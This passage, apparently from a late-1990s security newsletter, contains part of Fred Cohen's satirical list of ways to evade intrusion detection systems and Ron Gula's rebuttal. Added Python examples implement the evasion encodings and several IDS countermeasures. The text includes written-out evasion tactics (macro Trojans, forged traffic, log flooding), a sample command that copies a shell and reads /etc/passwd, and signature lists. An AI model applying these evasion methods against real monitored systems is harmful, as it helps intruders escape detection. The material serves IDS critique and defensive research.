platform is taken over, the IDS can be subverted.
24 - Create false audit records to confuse the IDS. For example, send packets to the IDS in between the packets that might
indicate an attack, containing information that makes the attack actions look harmless.
25 - Consume all IDS disk space then launch for real. By (for example) overrunning the disk space consumed by the IDS with
innocuous but detected sequences, the IDS will fail and subsequent attacks go undetected.
26 - Stop the generation or collection of audit records then attack. For example, by creating a large number of processes, the
system running the IDS may not be able to create the process needed to generate an audit record.
27 - Cause the response system to disrupt normal communications. For example, some IDS systems respond to repeated attacks
from a site by cutting off all traffic from that site. By forging malicious traffic coming from a particular host, the IDS may cut off all
traffic from that host, after which it can be attacked at will.
28 - Type everything in backwards and use a translator program to reverse it. Do the same in transmissions sent back to you.
29 - Type everything in infix notation and have it translated via ‘awk’ into prefix notation. The IDS may be unable to interpret the
traffic.
30 - Use ‘emacs’ as the shell and use wipes and yanks in and out of the ‘cmd’ buffer instead of typing. The IDS will see things
like control-W and control-Y while the command interpreter on the victim site will see malicious commands.
Bonus attack - Type very slowly (over a period of hours per command line should do nicely). Since buffer sizes are limited, your
traffic may be lost in the glut of other things the IDS has to watch.
31 - Change routes to target to avoid the IDS.
32 - Change return routes from target to avoid the IDS.
33 – Use source routing to reroute each packet through a different path to the victim, thus avoiding any single IDS.
34 - Start an outbound session from the victim via a modem and attack over that connection. If the IDS is network-based, it will
miss these packets.
35 - Interfere with the infrastructure between the victim and the IDS. In remote monitoring and network-based IDS systems, this
is often possible by modifying router traffic (as a simple example).
36 - Break into an intermediary to break the traceback of the attack. The intrusion may be detected, but they won’t be able to
trace it to you (unless they are very good at traces).
37 - Start a session on an unusual IP port. These ports are often not understood or watched by IDS systems.
38 - Use a modified protocol for communications, such as one that reverses bytes on words. (See PDP-11 and VAX encodings
for examples).
39 - Use IPX over IP for the attack. The IDS will probably only notice the IP packets and not understand the content.
40 - Use a different tunneled protocol session for the attack – such as IP over HTML.
Bonus Attack - Define your own protocol for a new application and attack over it.
41 - Attack over dial-ins instead of a network. Network-based IDS systems will never notice this activity.
42 - Create large numbers of false positives to increase noise level. This will make finding the real attack human time intensive and
people tend to fail under these circumstances.
43 - Plant the intrusion instructions within a Word macro and send a document to the victim. The IDS probably can’t decode the
attack inside the macro.
44 - Plant the intrusion code within another macro and send to victim. Power point perhaps, or 123, or … you get the idea.
45 - Put the attack in a compiled program (i.e., a Trojan Horse) and get the victim to download the attack and run it for you.
46 - Use a rarely used protocol for the attack. Chances are the IDS doesn’t know how to interpret the packets.
47 - Recode the attack in a different language than it was originally published in.
48 – Use any non-technical attack (such as so-called human engineering). Since the IDS only looks at bits and bytes, it doesn’t
detect many of the common attacks used by attackers today.
49 - Attack any system that doesn't run Unix. Since almost all of today’s IDS systems only look for Unix attacks, everything else
will pass undetected. (Some apparently detect NT attacks now as well.)
50-1000+ - Use one of the 1000 or so published attacks not detected by current systems. The largest number of detected attacks
I have seen advertised to date as being detected by any such system is only about 50. (One vendor recently claimed over 150, but
the newest numbers I heard for known vulnerabilities has gone up to 2,000) Nevertheless, 150 is progress over 50!
Bonus attacks - 1000+ to infinity - Create a new attack script. IDS systems today almost all look only for a small number of
known attacks.
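Items 13, 19, 20, 28 and the row-table bonus above are one idea in several costumes: move the attack out of the form a pattern matcher expects, and restore it at the far end. The following is an added example, not part of Cohen's article, that implements those transforms and runs a naive substring sensor over both the wire form and the form the victim's shell actually executes. The signatures, the code book, the swap table, the row table and the sample commands are all constructed for illustration and are not taken from any real IDS rule set.

```python
"""Added example, not part of Cohen's article: items 13, 19, 20, 28 and the
row-table bonus as transforms over a command line.  Each transform is
applied on the attacker side and undone on the victim side; a naive
substring sensor is then run over the wire form and the decoded form.
Signatures, code book, swap table and sample commands are constructed."""
import re

# Constructed signature set: literal strings a 1990s network sensor might
# look for in a cleartext login session.
SIGNATURES = ("/etc/passwd", "tprof", "cp /bin/sh")

def match_signatures(text, signatures=SIGNATURES):
    """Naive matching: return the signatures that occur literally in text."""
    return tuple(s for s in signatures if s in text)

# Item 13: code-book substitution (what the attacker's sed script would do).
# Codes are chosen so they cannot occur in ordinary shell text, which keeps
# decoding unambiguous; longer plaintexts are replaced first.
CODEBOOK = {"/etc/passwd": "%%P", "/bin/sh": "%%S", "tprof": "%%T", "cp": "%%C"}

def encode_codebook(cmd, book=CODEBOOK):
    for plain, code in sorted(book.items(), key=lambda kv: -len(kv[0])):
        cmd = cmd.replace(plain, code)
    return cmd

def decode_codebook(cmd, book=CODEBOOK):
    for plain, code in book.items():
        cmd = cmd.replace(code, plain)
    return cmd

# Item 20: exchange characters pairwise (an awk one-liner on the wire).
# A pairwise swap is its own inverse, so one table both encodes and decodes.
_PAIRS = [("a", "q"), ("e", "x"), ("s", "j"), ("t", "k"), ("/", "|")]
_SWAP = str.maketrans({**{a: b for a, b in _PAIRS}, **{b: a for a, b in _PAIRS}})

def swap_chars(cmd):
    return cmd.translate(_SWAP)

# Item 28: send the line backwards (also its own inverse).
def reverse_line(cmd):
    return cmd[::-1]

# Bonus attack: the wire carries a row number and the victim-side stub
# expands it.  Only the verb is hidden; the arguments travel in the clear.
COMMAND_TABLE = {15: "dir", 7: "cat", 9: "cp"}

def encode_table(cmd, table=COMMAND_TABLE):
    verb, _, rest = cmd.partition(" ")
    rows = {v: k for k, v in table.items()}
    return f"{rows[verb]} {rest}".rstrip() if verb in rows else cmd

def decode_table(cmd, table=COMMAND_TABLE):
    row, _, rest = cmd.partition(" ")
    if row.isdigit() and int(row) in table:
        return f"{table[int(row)]} {rest}".rstrip()
    return cmd

TRANSFORMS = {
    "codebook": (encode_codebook, decode_codebook),
    "swap": (swap_chars, swap_chars),
    "reverse": (reverse_line, reverse_line),
    "table": (encode_table, decode_table),
}

def run_session(cmd, name):
    """Return (wire_form, wire_hits, host_hits) for one transform: wire_hits is
    what a sensor matching the raw session bytes sees, host_hits is what a
    sensor reading the decoded command (a host-side audit trail, say) sees."""
    encode, decode = TRANSFORMS[name]
    wire = encode(cmd)
    host = decode(wire)
    assert host == cmd, "transform must round-trip"
    return wire, match_signatures(wire), match_signatures(host)

# Item 19: the same trick applied to data the exploit sends back.  A passwd
# line is easy to fingerprint by its colon-separated field layout ...
PASSWD_LINE = re.compile(r"^[^:\s]+:[^:]*:\d+:\d+:")

def looks_like_passwd(line):
    return PASSWD_LINE.match(line) is not None

def launder_passwd(line):
    """... so Cohen's sed script turns every ':' into '-' before it leaves."""
    return line.replace(":", "-")

if __name__ == "__main__":
    attack = "cp /bin/sh /tmp/x; cat /etc/passwd"     # constructed sample
    for name in TRANSFORMS:
        wire, wire_hits, host_hits = run_session(attack, name)
        print(f"{name:8} wire={wire!r:40} wire_hits={wire_hits} host_hits={host_hits}")
    sample = "root:x:0:0:root:/root:/bin/sh"           # constructed, not a real file
    print(looks_like_passwd(sample), looks_like_passwd(launder_passwd(sample)))
```

Running it shows the asymmetry the list relies on: for the code-book, swap and reversal transforms the wire form matches nothing while the decoded form matches everything, and for the row table the hidden verb buys little because the argument string is still on the wire. It also shows why the commentary that follows keeps pointing at host-based sensors: they see the decoded form.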
Afterword:
This ends the original article sent to the Computer Security Institute, but it doesn’t even start to end the story of what happened
later. It ended up that the URL for this article was sent to a mailing list for principal investigators funded in the intrusion detection
research area. It seems that some of them have not yet mastered the art of laughing at themselves and were more than a bit upset
at my statements. Others were quite whimsical, and still others took a serious tone but were not offended by the content.
What was strange to me was that I led a serious study of intrusion detection systems less than a year earlier and had the results
reviewed by these same folks. Almost none of them had more than a passing comment on the technical paper that indicated all of
the weaknesses described in this article and a large class of other ones. While I rarely do such a thing, I will quote here from a
private email I sent to one of these folks:
Pretty strange to watch all this commentary in the research community over a paper intended as a humorous poke at
vendors trying to sell poor quality solutions to unsuspecting computer security managers at companies. The serious
paper is the national infosec technical baseline, but it apparently engendered no such discussion.
When will I learn that people ignore my serious work and pay lots of attention to my play pieces.
Summary and Conclusions:
I have a policy of always delivering a little bit more than I promise. While at least one early reader of this article declared that I
could not count, they also asserted that there were only 40 ways listed in the article. When I read the comment I immediately went
back and recounted, and I am pretty sure I have exceeded my goal of 50 ways.
If you laughed at some of these attacks, I am glad, because many of the current intrusion detection systems are, in my opinion,
laughable. If you are offended by my disregard for the products available today, you are probably a vendor in this field wishing I
hadn’t told all those decision makers how to ask the tough questions about your product.
The major conclusion that I draw from the 50 ways is that intrusion detection is still in its infancy. In many cases, products are
simply not ready for prime time, and in other cases, the efforts required to make them viable in your business are not justified by
the acquisition, configuration, or operation costs.
I hope you have enjoyed this holiday article and that you will enjoy and prosper throughout the coming year. Happy holidays.
About The Author:
Fred Cohen is a Principal Member of Technical Staff at Sandia National Laboratories and a Senior Partner of Fred Cohen and
Associates in Livermore California, an executive consulting and education group specializing in information protection. He can be
reached by sending email to fc@all.net.
@HWA
105.0 50 reasons IDS systems work by Ron Gula
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"50 Reasons IDS Systems Work"
Comment and review of the article, "50 Ways to Defeat Your Intrusion Detection System" authored by Fred Cohen.
By Ron Gula
June 1999
Several of our customers have pointed out an excellent article about weaknesses in intrusion detection by
Fred Cohen entitled " 50 Ways to Defeat Your Intrusion Detection System". All fifty ways are included in
this paper, but the original version can be downloaded from http://all.net if so desired. In the paper, Mr.
Cohen states "... while the idea of intrusion detection systems was an interesting one and one that should
be followed as a possible candidate for helping to address this challenge, current systems were so poor as to
be not worth the effort to implement them." Mr. Cohen was claiming that intrusion detection was of little
use in helping increase or manage network security. The paper then lists 55 techniques that an attacker can
use to bypass intrusion detection systems.
This article comments on each of the 55 techniques. Many of these techniques are either irrelevant or
simply don't work. Almost all of the attacks are techniques that can be deployed with pre-existing system
access. A significant percentage of them are techniques one can use to abuse a pre-established Telnet
session. Our intent is to educate readers by providing a different perspective of network and computer
intrusion detection systems.
The 50 Ways:
1 - Inserting extraneous characters into a standard attack typically causes detection failure. As an example,
you could insert the string '&& true' into a typical shell command line without ill effect on operation but
with degraded IDS performance.
In general, this is only true if the attack medium can accept extra benign characters. For example, the PHF
web attack uses a string of '/cgi-bin/phf'. There aren't any characters that can be prefixed or appended that
will cause a web server to still accept the URL. In the above example, if one were to exploit the older AIX
'tprof' get-root, the 'tprof' program would need to be invoked at some point. Any IDS that matched on that
word would have a positive match. Very few IDS systems look for complex attacks. They look for the
smaller pieces of the attack.
2 - Use tabs instead of spaces in commands. Since most current systems don't interpret all separators in the
same way, changing to non-standard separators can make them fail. You might also try ',' instead of ';' in
the Unix shell.
Same as number one. Using several tabs to run the 'tprof' program still requires 'tprof' to appear in a
command line. And that can cause a host or network based IDS to detect the attack.
3 - Closely related to number 2, you could change the separator character in the system so that (for
example) % is the separator. This would confuse detection systems almost without exception.
This requires modification of the IFS (internal field separator) environment variable. Many host based IDS
products alert on modification of this field. Most network based IDS products don't concentrate on these
sort of attacks. However, the attacks described in 1, 2 and 3 would not affect host-based IDS products such
as Tripwire, Stalker and CMDS.
4 - Reorder a detected attack sequence. For example, if the attack goes 'a;b;c' and it would also work as
'b;a;c', most detection systems would rank the one they were not tuned to find as unlikely to be an actual
attack.
Logically this is an appealing argument, however modern vulnerabilities are usually exploited in one step.
These vulnerabilities can be identified by many different IDS products. More complex attacks are also
likely to have a few of their individual steps detected by an IDS.
5 - Split a standard attack across more than one user. Using the 'a;b;c' example above, if user X types 'a;b'
and user Y types 'c' the attack is almost certain to go undetected.
Again, if steps 'a', 'b' or 'c' are required to do an attack, then it is likely that an IDS will pick up on at least
one of them, regardless of which user executes it. Using multiple accounts does confuse security operators,
but exploits still tend to be detected.
6 - Split a standard attack across multiple sessions. Login once and type 'a;b', logout, then login and type 'c'.
Same as #5. Get-root exploit scripts can be multiple lines long, but the bottom line is that they really only
do the exploiting on one line. For example, there has to be a command that causes a user to go from a non-
privileged user to a super user.
7 - Split across multiple remote IP addresses/systems. Login from sites X and Y, and type 'a' from site X, 'b'
from site Y, and 'c' from site X.
Again, same as #5 and #6. The extra traffic may also raise the interest of a network based IDS. And IDS
products such as CMDS will notice multiple remote accesses from different locations in a small amount of
time.
8 - Define a macro for a command used in a standard attack. For example, set a shell variable called '$ZZ'
to 'cp' and then use '$ZZ' instead of 'cp' where appropriate.
Adds complexity, but an IDS should be able to detect the access. Imagine an IDS that triggers on the 'tprof'
program. It will log an event when it is used in a macro assignment. The same is true for methods that
redefine a shell variable for the /etc/passwd file. Any IDS that triggers on access to the /etc/passwd file in a
Telnet session would alert on that event. And again, these techniques do little to stop detection in the face
of host based IDS systems such as CMDS, Stalker and Tripwire.
9 - Define a macro for a parameter in a standard attack. For example, use the name '$P' instead of the string
'/etc/passwd'.
See #8.
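The separator and shell-variable tricks in items 1 to 3, 8 and 9 have one thing in common: the victim's shell undoes them at expansion time, so a sensor that replays the session the way sh would can undo them too. The following is an added example, not part of this review and not taken from any IDS product, that normalises a session transcript before matching and then checks the counter-point made above, that the literal string still has to be typed somewhere. The transcript, the signatures and the variable names are constructed for illustration.

```python
"""Added example, not part of Gula's review or of any IDS product: a session
normaliser that undoes the tricks in items 1 to 3, 8 and 9 before signature
matching, plus a per-line literal matcher for the counter-argument.  The
transcript, signatures and variable names are constructed for illustration."""
import re

SIGNATURES = ("/etc/passwd", "tprof", "cp /bin/sh")

# Constructed transcript of what crosses the wire.  The attacker wants to run
# "cp /etc/passwd /tmp/x" and then "tprof /tmp/x" without either literal
# appearing on a command line.
SESSION = [
    "ZZ=cp",                       # item 8: macro for the command
    "P=/etc/passwd",               # item 9: macro for the parameter
    "IFS=%",                       # item 3: '%' becomes the field separator
    "$ZZ%$P%/tmp/x\t&&\ttrue",     # items 1 and 2: tabs and a '&& true' no-op
    "IFS=' '",                     # put the separator back
    "T=tpr; U=of",                 # keyword split across two variables
    "${T}$U /tmp/x",               # reassembled only at expansion time
]

ASSIGN = re.compile(r"^([A-Za-z_]\w*)=(.*)$")
REF = re.compile(r"\$\{(\w+)\}|\$(\w+)")

def match_signatures(text, signatures=SIGNATURES):
    """Naive matching: return the signatures that occur literally in text."""
    return tuple(s for s in signatures if s in text)

def normalise_session(lines):
    """Replay the transcript as sh would: record plain assignments, expand
    $VAR and ${VAR}, field-split the results of expansion on the IFS in
    force (an empty IFS disables splitting, as in sh), collapse blanks and
    drop the '&& true' no-op.  Returns the commands the shell actually runs."""
    env, ifs, commands = {}, " \t", []
    for raw in lines:
        line = re.sub(r"\s*&&\s*true\b", "", raw)              # item 1
        for part in re.split(r"\s*;\s*", line.strip()):
            m = ASSIGN.match(part)
            if m:                                              # items 3, 8, 9
                name, value = m.group(1), m.group(2).strip("'\"")
                if name == "IFS":
                    ifs = value
                else:
                    env[name] = value
                continue
            words = []
            for word in re.split(r"[ \t]+", part):             # item 2
                if not word:
                    continue
                expanded = REF.sub(lambda mo: env.get(mo.group(1) or mo.group(2), ""), word)
                if expanded != word and ifs:
                    words.extend(w for w in re.split("[" + re.escape(ifs) + "]+", expanded) if w)
                else:
                    words.append(expanded)
            if words:
                commands.append(" ".join(words))
    return commands

def detect(lines):
    """Signature hits over the normalised command stream."""
    return match_signatures("\n".join(normalise_session(lines)))

def first_literal_sighting(lines, signatures=SIGNATURES):
    """The counter-argument: the literal has to be typed somewhere (here in
    the assignment), so a per-line matcher still sees it.  Returns the first
    raw line number on which each signature appears."""
    seen = {}
    for n, raw in enumerate(lines, 1):
        for s in signatures:
            if s in raw and s not in seen:
                seen[s] = n
    return seen

if __name__ == "__main__":
    print("raw wire hits:   ", match_signatures("\n".join(SESSION)))
    print("normalised:      ", normalise_session(SESSION))
    print("normalised hits: ", detect(SESSION))
    print("first literal:   ", first_literal_sighting(SESSION))
```

The two matchers disagree in an instructive way. A per-line literal matcher still catches '/etc/passwd' on the assignment line, which is the point made above, but it never sees 'tprof' because that keyword was split across two variables and only exists after expansion; the normaliser recovers both. The cost is that the sensor now has to track per-session shell state, including IFS, which is exactly the kind of work a network sensor of this period did not do.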
10 - Create shell scripts to replace commands you use. If you do this carefully, the detector will not
associate the names you use for the scripts to the commands and will miss the whole attack.
This is the first real technique that is actually possible. Unfortunately, it does not address what happens after
the attack has succeeded. Tools such as CMDS will detect login sessions that are out of character. Tripwire
will detect any backdoors. Renaming tools such as 'nmap' and 'strobe' is a good idea, but as soon as they
are used, a network based IDS will pick them up.
------------------------------------------------------------------------
Bonus attack - Add comments to attack lines in an attack that would otherwise be detected.
------------------------------------------------------------------------
If the attack is referring to a get-root exploit script, then most IDS products are robust enough to detect
variations in the attack. This was discussed in 4,5,6 and 7.
11 - Use different commands to do the same function. For example, 'echo *' is almost the same as 'ls' in the
Unix shell.
One would still need to run 'tprof' if one were to exploit it. Even if one were to compile a binary program
on a different system rather than simply run the 'tprof' program, many different IDS systems such as Stalker and
SeOS would see the unauthorized transition from an unprivileged user to a root user.
12 - Change the names in standard attacks. For example, if the standard attack uses a temporary file named
'xxx', try using 'yyy'.
This assumes that an IDS is searching for too specific an exploit. See 11.
13 - Create a code-book translator for attack keywords. This can be done by piping all commands through a
filter program - perhaps using 'sed' to do string substitution.
See 11.
14 - Encode the attacks in 'ebcdic' and change terminal types to an 'ebcdic' terminal. Since all the characters
are differently coded, the detector will be unable to decode your actions.
See 11.
15 - Encrypt your attacks - for example, by using the secure shell facilities intended to increase protection
by preventing snooping - including snooping by the IDS.
This is only true for network based IDS systems. Host based systems have full access to a user's actions
under Secure Shell.
16 - Use a postfix notation for transmissions, and then translate back at the other end. The detector will not
be able to understand the syntax.
See 15.
17 - Turn on full duplex communications mode with the target. The extra characters going back and forth
may confuse the IDS.
Dragon, T-Sight and all versions of the DoD NID program are not vulnerable to this.
18 - Intermix several known intrusion techniques by alternating one instruction from each. The IDS is
likely not to recognize any of the attacks.
Or it is more likely to recognize at least one of the attacks. This is very similar to 5, 6 and 7 and is not a
new technique.
19 - Encode results sent by daemons so that the patterns of what is returned cannot be used for detection.
For example, instead of mailing yourself a password file by exploiting a sendmail bug, pipe the password
file through a sed script that changes the ':'s to '-'s.
The bug still needs to be exploited. What happens to the password file after the exploit is interesting, but
not directly part of the exploit.
20 - Attack by piping everything through an awk script that exchanges characters. This will confuse the
IDS.
Same as 15. This is not a new attack.
------------------------------------------------------------------------
Bonus attack - Run commands selected from a table by the row number and have the victim system do the
command-line calls. So you might send '15 *.com' and the victim system might do 'dir *.com'.
------------------------------------------------------------------------
Same as 15. This is just a new way of encrypting shell commands.
21 - Overwhelm the IDS sensor ports. For example, by using an echo virus against a UDP port, you might
make the sensor port unable to receive further sensor inputs.
Most network based IDS products are deployed securely and many have the ability to implement sensor
interfaces without IP stacks. Some of the IDS products, such as Dragon, don't even have any open UDP or
TCP ports. RealSecure, NetProwler, and NetRanger also could unbind the IP stack to prevent compromise.
22 - Crash the IDS with ping packets. By sending long PING packets, many systems that run IDS systems
can be crashed, causing them to fail to detect subsequent attacks.
A second denial of service technique is not a new way to defeat an IDS. Elaborating on 21, most network
IDS platforms are stripped down and deployed in a higher state of security than the surrounding network
environment. Although, I'm sure there are many network IDS systems running on Windows NT servers that
have been deployed out of the box and vulnerable to many DoS and other attacks.
23 - Kill the IDS by attacking its platform. Most IDS systems run on regular hosts which can themselves be
attacked. Once the platform is taken over, the IDS can be subverted.
How is this different than 22 and 21?
24 - Create false audit records to confuse the IDS. For example, send packets to the IDS in between the
packets that might indicate an attack and containing information that makes the attack actions look
harmless.
SNI wrote an excellent paper on this topic. NFR and Dragon network based IDS systems are not vulnerable
to these attacks. And in general, host based IDS products have never been vulnerable to these attacks.
25 - Consume all IDS disk space then launch for real. By (for example) overrunning the disk space
consumed by the IDS with innocuous but detected sequences, the IDS will fail and subsequent attacks go
undetected.
How can one tell when a passive network IDS has crashed? If the IDS is logging all this data, it will also
probably be noticed by someone if they have a clue. The last thing that an attacker wants to do is raise the
awareness of network defenders.
26 - Stop the generation or collection of audit records then attack. For example, by creating a large number
of processes, the system running the IDS may not be able to create the process needed to generate an audit
record.
This is a localized denial of service attack. Many UNIX operating systems are resistant to these local
attacks. Host based IDS products that use single processes are also immune. More likely, if this is a heavily
used server, the high number of processes will be noticed by an administrator.
27 - Cause the response system to disrupt normal communications. For example, some IDS systems
respond to repeated attacks from a site by cutting off all traffic from that site. By forging malicious traffic
coming from a particular host, the IDS may cut off all traffic from that host, after which it can be attacked
at will.
This is my favorite attack described in Mr. Cohen's article. If I understand this correctly, this example tries
to use the IDS's automatic blocking of IP addresses against the defended network. Some IDS products such
as CMDS, NetRanger, NetProwler and RealSecure can "speak" with firewalls and routers. When certain
events occur, the routers and firewalls can be asked to restrict traffic from a particular host. There are
some traffic flow problems with this technique, namely firewalls and IDS systems typically work on the
perimeter of a defended network. When traffic is restricted, it is inbound traffic. The target host will not be
isolated for attack.
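As an added illustration of the defensive side of item 27 (this is example code, not part of the rebuttal, Mr. Cohen's article, or any of the products named), the following sketches an automatic blocking policy that cannot easily be turned against the defended network: it acts only on evidence that is hard to forge (an established TCP session rather than a bare SYN, UDP datagram or ICMP packet), it never blocks allow-listed infrastructure, and the rule it emits is inbound-only, which is the traffic-flow point the rebuttal makes. The design, the addresses and the signature names are all assumptions constructed for the example.

```python
"""
Added example (assumed design, not any product's actual response logic): an
automatic blocking policy that resists the trick in item 27, where forged
traffic makes the IDS cut off a legitimate host. It acts only on evidence
that is hard to spoof, never on allow-listed infrastructure, and produces an
inbound-only rule. Addresses and signature names are constructed.
"""
from dataclasses import dataclass, field

# Infrastructure the defended network cannot afford to lose (assumption for the example).
NEVER_BLOCK = {"10.0.0.53", "10.0.0.25", "192.0.2.10"}   # DNS, mail relay, partner VPN peer


@dataclass
class Alert:
    src: str
    dst: str
    proto: str          # "tcp", "udp" or "icmp"
    established: bool   # True only if the sensor saw a completed three-way handshake
    signature: str


@dataclass
class ResponsePolicy:
    threshold: int = 3                      # repeated hits before acting, as the rebuttal describes
    counts: dict = field(default_factory=dict)
    blocked: dict = field(default_factory=dict)   # src -> signature that triggered the block

    def consider(self, alert):
        """Return ("block", rule) or ("log", reason) for one alert."""
        if alert.src in NEVER_BLOCK:
            return "log", f"{alert.src} is allow-listed; recorded but never blocked"
        # Datagrams and bare SYNs carry no proof of the source address, so a
        # forged packet could name any host. Log them, never block on them.
        if alert.proto != "tcp" or not alert.established:
            return "log", f"{alert.src}: spoofable evidence ({alert.proto}, established={alert.established})"
        key = (alert.src, alert.signature)
        self.counts[key] = self.counts.get(key, 0) + 1
        if self.counts[key] < self.threshold:
            return "log", f"{alert.src}: {self.counts[key]}/{self.threshold} hits for {alert.signature}"
        # Inbound-only rule: the host's own outbound traffic is untouched, which is
        # why the rebuttal notes the target is not isolated for attack.
        self.blocked[alert.src] = alert.signature
        return "block", f"deny inbound from {alert.src}"


if __name__ == "__main__":
    policy = ResponsePolicy()
    sample = [   # constructed scenario
        Alert("10.0.0.53", "10.0.0.80", "udp", False, "dns-overflow"),   # forged, names the DNS server
        Alert("203.0.113.9", "10.0.0.80", "tcp", False, "port-scan"),     # SYN only, spoofable
    ] + [Alert("198.51.100.7", "10.0.0.80", "tcp", True, "cgi-probe")] * 3
    for a in sample:
        print(a.src, a.signature, *policy.consider(a))
```

The first two constructed alerts are logged but never acted on, because nothing in a UDP datagram or an unanswered SYN proves who sent it; only the third source, seen three times inside an established session, produces a rule, and that rule restricts inbound traffic only.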
28 - Type everything in backwards and use a translator program to reverse it. Do the same in transmissions
sent back to you.
Same as 15. This is just a new way to disguise shell commands.
29 - Type everything in infix notation and have it translated via 'awk' into prefix notation. The IDS may be
unable to interpret the traffic.
Same as 15. Both 28 and 29 only apply when a network based IDS is watching a Telnet or Rlogin session.
These techniques cannot be easily replicated on FTP, HTTP, SMTP and many other protocols.
30 - Use 'emacs' as the shell and use wipes and yanks in and out of the 'cmd' buffer instead of typing. The
IDS will see things like control-W and control-Y while the command interpreter on the victim site will see
malicious commands.
NFR and RealSecure detect the use of 'emacs' because anyone who doesn't use 'vi' is obviously a hacker.
No seriously, this attack is just another way to hide "in plain sight" over a Telnet or Rlogin session.
------------------------------------------------------------------------
Bonus attack - Type very slowly (over a period of hours per command line should do nicely). Since buffer
sizes are limited, your traffic may be lost in the glut of other things the IDS has to watch.
------------------------------------------------------------------------
A network based IDS is vulnerable to this. However host based systems aren't. Some network based IDS
systems such as NFR and Dragon can even be configured to detect long term low bandwidth network
sessions.
31 - Change routes to target to avoid the IDS.
This is a valid attack if the topology is known beforehand. Many times, in order to
accomplish this, a certain amount of network discovery is required. This mapping can be easily picked up
by most network based IDS products. It also requires perfect knowledge of where passive IDS systems are
deployed.
32 - Change return routes from target to avoid the IDS.
See 31.
33 - Use source routing to reroute each packet through a different path to the victim, thus avoiding any
single IDS.
Almost every firewall, router and server drops and logs source routed packets. 31,32 and 33 also assume
that there are alternate network paths to target servers when in fact most network IDS systems are
deployed as choke points.
34 - Start an outbound session from the victim via a modem and attack over that connection. If the IDS is
network-based, it will miss these packets.
Absolutely. We can add even more methods to defeat intrusion detection systems by identifying them and
then launching attacks that they do not detect. For example, we may be able to deliver a virus to a
Windows NT system protected by Axent IA, BlackICE or even RealSecure. None of those systems detect
system level viruses.
35 - Interfere with the infrastructure between the victim and the IDS. In remote monitoring and network-
based IDS systems, this is often possible by modifying router traffic (as a simple example).
This is a lot like 33. Network based IDS products 'sniff' network traffic. If the traffic isn't there to 'sniff' then
there is no intrusion detection. This attack is only valid if the attacker can modify internal network routing
and there are other access points for the traffic to flow. Many network IDS products also detect when there
are attempts to re-route traffic.
36 - Break into an intermediary to break the trace back of the attack. The intrusion may be detected, but
they won't be able to trace it to you (unless they are very good at traces).
The original article was entitled "50 Ways to Defeat Your Intrusion Detection System". This method does
not defeat detection, only the chance that the ultimate target will figure out exactly who is doing the
attacking. One could also argue that the intermediary target is just as likely to detect an attack as the
ultimate target.
37 - Start a session on an unusual IP port. These ports are often not understood or watched by IDS systems.
This assumes that an attacker already has access to a system on the target network. Brand new attacks
don't start this way. There are a wide variety of programs such as NetCat which can be used to open up
ports in unusual places. Many of these programs are detected by network IDS products. Some of them, such
as RealSecure, even detect LOKI ICMP sessions.
38 - Use a modified protocol for communications, such as one that reverses bytes on words. (See PDP-11
and VAX encoding for examples).
This simply "encrypts" a network communication. It assumes that there is a cooperating system on the
target network.
39 - Use IPX over IP for the attack. The IDS will probably only notice the IP packets and not understand
the content.
And if the target network has an IPX based IDS it will pick up the attack accordingly.
40 - Use a different tunneled protocol session for the attack - such as IP over HTML.
This is another communication encryption technique.
------------------------------------------------------------------------
Bonus Attack - Define your own protocol for a new application and attack over it.
------------------------------------------------------------------------
See 40. If you have access to a system, write your own encrypted pipe and then communicate with it from
someplace else in front of an IDS, that is not defeating the IDS. None of these methods consider all of the
poking and prodding that it may take to find the right combination of IP protocol or TCP/UDP source port
to bypass a firewall.
41 - Attack over dial-ins instead of a network. Network-based IDS systems will never notice this activity.
Absolutely. See 34.
42 - Create large numbers of false positives to increase noise level. This will make finding the real attack
human time intensive and people tend to fail under these circumstances.
Interesting point, but consider that network management systems are designed to process and present
information that could not be understood by any human. IDS systems are the same way. For example with
Dragon (shameless product placement) there are a variety of different tools to look at different data at
many different levels of abstraction. Tools from companies such as WebTrends tend to present all sorts of
security information in a very easy to understand format. And I am of the opinion that the last thing an
attacker may want to do is put a target on high alert.
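To make the rebuttal's point about presenting alert data at a higher level of abstraction concrete, here is an added example (not code from the rebuttal, from Dragon or from any other product) of the kind of triage that defuses item 42: alerts are grouped by signature and source, a group that exceeds a storm threshold collapses into a single summary record, and the one event that is different stands out instead of being buried. The log line format, the threshold and the 301 sample alerts are constructed for the example.

```python
"""
Added example (not from the rebuttal or any product): triage that collapses an
alert flood into one summary record so that noise raised to bury a real event
(item 42) does not cost analyst attention per alert. The log line format,
the storm threshold and the sample alerts are constructed for this example.
"""
import re

STORM_THRESHOLD = 50   # alerts from one (signature, source) pair before we summarise
LINE_RE = re.compile(r"^(\S+ \S+) sig=(\S+) src=(\S+) dst=(\S+)$")


def parse_alert(line):
    """Parse one constructed alert line; return None for lines that don't match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, sig, src, dst = m.groups()
    return {"ts": ts, "sig": sig, "src": src, "dst": dst}


def triage(lines):
    """Group alerts by (signature, source). Returns (storms, individual)."""
    groups, order = {}, []
    for line in lines:
        a = parse_alert(line)
        if a is None:
            continue
        key = (a["sig"], a["src"])
        if key not in groups:
            groups[key] = {"sig": a["sig"], "src": a["src"], "count": 0,
                           "first": a["ts"], "last": a["ts"], "dsts": set()}
            order.append(key)
        g = groups[key]
        g["count"] += 1
        g["last"] = a["ts"]
        g["dsts"].add(a["dst"])
    storms = [groups[k] for k in order if groups[k]["count"] >= STORM_THRESHOLD]
    individual = [groups[k] for k in order if groups[k]["count"] < STORM_THRESHOLD]
    return storms, individual


def render(storms, individual):
    """Analyst view: one line per storm, one line per remaining group."""
    out = []
    for g in storms:
        out.append(f"STORM  {g['sig']} from {g['src']}: {g['count']} alerts "
                   f"{g['first']}..{g['last']} against {len(g['dsts'])} host(s)")
    for g in individual:
        out.append(f"ALERT  {g['sig']} from {g['src']} -> {','.join(sorted(g['dsts']))} "
                   f"({g['count']} alert(s), first {g['first']})")
    return out


def constructed_log():
    """Constructed sample: 300 identical CGI-probe alerts hiding one different event."""
    lines = []
    for i in range(300):
        lines.append(f"1999-06-20 14:{i // 60:02d}:{i % 60:02d} "
                     f"sig=web-cgi-probe src=203.0.113.5 dst=10.0.0.80")
        if i == 137:   # the real event, buried in the middle of the flood
            lines.append("1999-06-20 14:02:17 sig=rpc-overflow-attempt "
                         "src=198.51.100.7 dst=10.0.0.9")
    return lines


if __name__ == "__main__":
    for line in render(*triage(constructed_log())):
        print(line)
```

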